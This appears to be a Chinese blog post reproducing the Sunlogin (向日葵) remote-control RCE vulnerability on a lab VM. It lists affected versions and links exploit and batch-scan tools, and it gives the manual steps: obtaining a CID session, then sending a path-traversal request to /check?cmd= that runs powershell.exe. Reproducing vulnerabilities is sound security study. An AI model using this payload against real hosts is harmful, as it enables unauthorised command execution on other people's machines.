Loading

CNVD-2022-10270/CNVD-2022-03672 向日葵RCE复现

0x00-引言


本文内容及使用工具仅限学习交流,用户滥用造成的一切后果均与作者无关,作者不承担任何直接责任, 后果均由用户本人负责,使用者请务必遵守当地法律法规。

复现的速度赶不上大佬出脚本的速度,牛掰

0x01-漏洞描述


上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版和简约版,攻击者可利用该漏洞获取服务器控制权。

影响版本:

向日葵个人版   for Windows <= 11.0.0.33
向日葵简约版   <= V1.0.1.43315(2021.12)

0x02-漏洞复现


工具下载(含有漏洞版本的向日葵):
https://github.com/Mr-xn/sunlogin_rce/releases/tag/new

工具命令:

-h 指定目标
-t 选择扫描或者命令执行 默认scan
-p 设置扫描端口范围 默认4w到65535
-c 需要执行的命令
01-工具复现

打开向日葵(我的装在虚拟机里面)

image-20220217152529772

使用工具扫描-扫描时间长

image-20220217152758729

命令执行

image-20220217152910697

02-手动复现

nmap探测或者其他工具探测

image-20220217153839299

浏览器访问ip+端口号+cgi-bin/rpc?action=verify-haras(获取session值CID)一个一个端口尝试

image-20220217154020054

拿到CID-添加payload和cookie-发送

http://192.168.234.139:49676/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami

image-20220217154326473

image-20220217154550219

03-批量检测工具

建议使用kali跑脚本,因为脚本要使用nmap

工具下载:
https://github.com/mrknow001/Sunlogin-rce

image-20220217163926641

0x03-参考


https://mp.weixin.qq.com/s/h2h2sJsEEbXAYvxRl59uMw

https://www.t00ls.cc/articles-64617.html

posted @ 2022-02-17 16:49  美式加糖  阅读(1989)  评论(0编辑  收藏  举报